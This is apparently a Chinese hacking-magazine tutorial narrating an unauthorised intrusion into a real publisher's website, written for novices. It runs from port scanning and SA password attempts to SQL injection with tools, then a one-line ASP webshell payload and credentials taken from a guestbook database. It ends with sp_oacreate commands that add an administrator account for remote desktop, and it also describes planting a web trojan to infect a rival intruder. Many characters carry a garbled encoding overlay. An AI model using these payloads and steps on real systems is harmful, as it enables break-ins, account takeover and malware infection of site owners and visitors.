一.“戰(zhàn)爭”序幕的拉開

　　筆者最近在學習匯編，朋友推薦了一本不錯的書，跑遍了附近的書店都沒有找到，于是在baidu搜到了該出版社的網(wǎng)站，剛一打開，KV網(wǎng)頁監(jiān)控馬上報告“發(fā)現(xiàn)病毒已經(jīng)清除”如圖1

　　這種網(wǎng)站都會被人掛上木馬，幸好打過補丁了，要不系統(tǒng)就遭殃了！

發(fā)現(xiàn)有網(wǎng)頁木馬存在

　　小提示

　　網(wǎng)頁木馬的原理都是利用一些IE的漏洞來運行程序(一般都是木馬程序），現(xiàn)在流行的網(wǎng)頁木馬如：XP＋SP2的網(wǎng)頁木馬，最近新出了一個利用'Help Control Local Zone Bypass"的網(wǎng)頁木馬，需要的朋友可以去網(wǎng)上搜搜，一般黑客站點都有的。勤打補丁的話像市面上公布出來的網(wǎng)頁木馬就算打開了也沒有關(guān)系的！

　　看了一下這個網(wǎng)站支持在線購買圖書，反正也沒事干，那么就開始吧！

　　二.輪番轟炸

　　既然已經(jīng)被人掛了木馬，那就是有人進去過了，大體觀察了一下，它的網(wǎng)站是ASP+MSSQL的，沒有什么論壇，看來想拿webshell不是很容易。

　　還是看看它開了什么端口吧！

　　小提示

　　菜鳥：為什么很多文章中都提到掃描端口，掃描端口到底有什么用呢？

　　答：理論的東西不想多講了，通常說的掃描端口是指掃描TCP端口，系統(tǒng)中的每個網(wǎng)絡(luò)服務(wù)要與外部通信就必須用到端口，什么意思呢？

　　就好比你跟聾啞人溝通用的是手語，不同的系統(tǒng)服務(wù)會用到不同的端口，比如開網(wǎng)站的服務(wù)器，就肯定開放了80端口，根據(jù)端口的開放情況可以判斷對方開了哪些服務(wù)從而方便我們找對應的漏洞或者溢出！一會兒功夫掃描結(jié)果就出來了，圖2

　　開了80，110，25，1433，3389這幾個端口，110和25是發(fā)送郵件時用到的，3389不知道是先前的入侵者開的還是管理員自己管理用開的！IIS版本是5.0可能是win2K的服務(wù)器，我們登陸3389看看，為什么要登陸3389？登陸3389的目的主要是看看對方系統(tǒng)版本，圖3

登陸3389遠程控制端口查看對方操作系統(tǒng)

　　是windows2000服務(wù)器版的！知道了目標主機的一些基本信息，現(xiàn)在我們就針對這些信息來想出對應的入侵方案，110和25端口好像沒什么重要的漏洞，所以先放一邊，1433是MSSQL服務(wù)開放的端口，默認帳戶sa不知道有沒有弱口令，試試看，用SQL綜合利用工具連接用戶SA，密碼為空試試，圖4，

連接失敗，密碼不為空

　　提示連接失敗，看來密碼不為空，再試試sqlhello-SQL溢出看看對方MSSQL打沒有打SP3（現(xiàn)在國內(nèi)很多你無法想象的超級大站還存在這種低級漏洞呢?。?，圖5

發(fā)現(xiàn)普通的溢出無效

　　正向和反向的溢出都試過都是不行，看來這個漏洞是沒有了！剩下的只有80端口了，一般這個都是找腳本漏洞，在網(wǎng)站上找形如“xxx.asp?id=1"這樣的頁面，這個站上有很多，隨便試一個在后面加個單引號看看，圖6

在地址上加個單引號，產(chǎn)生錯誤了

一般出現(xiàn)像“錯誤 '80040e14' ”這樣的都是說明存在SQL注入，那句“ODBC SQL Server Driver”一般有“ODBC”的說明是MSSQL數(shù)據(jù)庫的，要是提示“JET”那就是ACCESS數(shù)據(jù)庫了！我們再用工具找找看，拿出“啊D注入工具”掃掃，然后筆者用“HDSI”注入（完全是個人習慣?。?，在啊D中的“注入點掃描”中輸入網(wǎng)站的URL，點擊右邊第一個按鈕就會自動檢測了，圖7

馬上將注入點復制到HDSI中進行注入，點擊“開始”，圖8，

發(fā)現(xiàn)有漏洞，嘗試注入

用注入工具掃描

連接數(shù)據(jù)庫的用戶居然是SA，一條思路馬上展現(xiàn)在眼前，就是用HDSI找到web目錄，然后通過數(shù)據(jù)庫備份上傳ASP木馬，hoho！點擊HDSI左邊的“列目錄”開始尋找網(wǎng)站目錄，終于被筆者找到了，圖9

　d:\xxxxhome下，馬上將一個ASP木馬的后綴改為txt用HDSI上傳到web目錄下，圖10

上傳文件失敗了

　　提示“上傳文件不成功！”怎么辦？沒事既然是sa的權(quán)限不能這樣上傳還有別的辦法，試了試用xp_cmdshell直接加用戶，TFTP上傳，寫腳本上傳統(tǒng)統(tǒng)失敗了！

筆者想，既然這個站已經(jīng)被人入侵過了，那么肯定會留下一些ASP木馬要是能找到一個小的ASP木馬不就可以上傳大馬了？繼續(xù)找，再次來到網(wǎng)站目錄下挨個看文件夾，突然看到一個MDB的目錄，心情開始激動了，顫抖的手點了下去。圖11

嘗試一下這個目錄可否上傳

　　里面有個guestbook.asp還有個a.asp，看看路徑寫著d:\xxxxhome\liuyan\mdb\，各位讀者猜到這是什么了么？對了留言板！

　我們知道了默認數(shù)據(jù)庫路徑而且數(shù)據(jù)庫以ASP結(jié)尾，如果在留言中插入那個一句話的ASP木馬提交這樣就會記錄在數(shù)據(jù)庫中，而數(shù)據(jù)庫又是ASP結(jié)尾的這樣就跟一個ASP木馬一樣了，訪問數(shù)據(jù)庫web地址頁面出現(xiàn)了亂碼，圖12

頁面出現(xiàn)了亂碼

　　這樣就是沒有做防下載處理，然后馬上在留言板中留言在“主頁”還有其他地方都輸入了“ ＜%eval request("#")%＞ ”提交成功，用海洋c端連接發(fā)現(xiàn)還是不成功（可能是被過濾掉了吧?。?！怎么辦呢？于是用迅雷下載了這個ASP數(shù)據(jù)庫改名為MDB后打開，找出管理員賬號密碼，圖13

管理員密碼居然是沒有MD5加密

登陸留言板，經(jīng)過測試發(fā)現(xiàn)在管理員頁面的公告中可以插入木馬，圖14

這回成功拿到webshell了（圖15 ）

拿到管理權(quán)了

　　對了忘記告訴大家剛剛跟guestbook.asp同一目錄下的那個a.asp就是別人留的海洋2006的asp木馬！

　　小插曲

　　訪問那個a.asp將html代碼保存下來，這里的代碼就是海洋2006的登陸界面，然后木馬編輯那個a.asp將里面的代碼全部清空掉，粘貼上剛剛復制的登陸頁面的html代碼，再在最下面掛上筆者的網(wǎng)頁木馬！這樣只要那家伙訪問自己的webshell雖然看到登陸界面了但是怎么也登陸不進去，而且還中了咱們的木馬！

　　三.拿下目標

　　筆者用的也是海洋2006不過是加密免殺的，現(xiàn)在就是提權(quán)了，用海洋的“服務(wù)器相關(guān)數(shù)據(jù)”看了看開的服務(wù)，發(fā)現(xiàn)并沒有安裝serv-U，很多菜鳥看到這里可能就會放棄了！其實沒有serv-u也沒關(guān)系，畢竟條條大陸通羅馬么！還記得剛剛注入時是SA的權(quán)限么？這就說明數(shù)據(jù)庫連接用的是SA，到網(wǎng)站主頁下隨便打開一個ASP文件看看，圖16

在主站打開一個ASP頁面看看代碼

　　“common/inc_const.asp”這個就是ASP被打開后先調(diào)用的數(shù)據(jù)庫連接文件了，我們馬上到該目錄下的common找到inc_const.asp對它編輯，圖17

發(fā)現(xiàn)數(shù)據(jù)庫連接文件

　　怎么樣？是不是有大發(fā)現(xiàn)了，其實提權(quán)就是這么簡單！SA密碼暴露無疑??！

　　現(xiàn)在該怎么辦呢？拿出SQL連接器輸入密碼連接上去，哈哈成功了，選擇“利用目錄”＝＝》“執(zhí)行DOS命令”加個用戶試試，圖18

執(zhí)行DOS命令

　發(fā)現(xiàn)xplog70.dll被刪了，既然開了3389只要加個用戶就可以了，加用戶也不一定要用XP_cmdshell，可以試試別的轉(zhuǎn)儲過程，打開"SQL查詢分析器分離版本"輸入IP和密碼點連接，圖19

嘗試連接

　　OK，我們在“查詢”中輸入：

declare @cmd INT
exec sp_oacreate 'wscript.shell',@cmd output
exec sp_oamethod @cmd,'run',null,'net user hack hack /add','0','true'

declare @cmd INT
exec sp_oacreate 'wscript.shell',@cmd output
exec sp_oamethod @cmd,'run',null,'net localgroup administrators hack /add','0','true'

　　這個就是增加一個hack的用戶密碼也是hack，再提升為管理員權(quán)限，圖20

提升管理權(quán)限

　　怎么樣？是不是條條大路通羅馬？

　　用增加的用戶登陸3389看看（圖21）

用3389端口，果然成功登陸了??！

　四.小結(jié)

　　由于篇幅問題還有很多入侵的過程沒有寫出來，這里寫的是主要的部分，文章讀起來很簡單，筆者在實際中可是遇到很多問題，想告訴廣大菜鳥朋友：真正的技術(shù)是實踐出來的不是看出來的。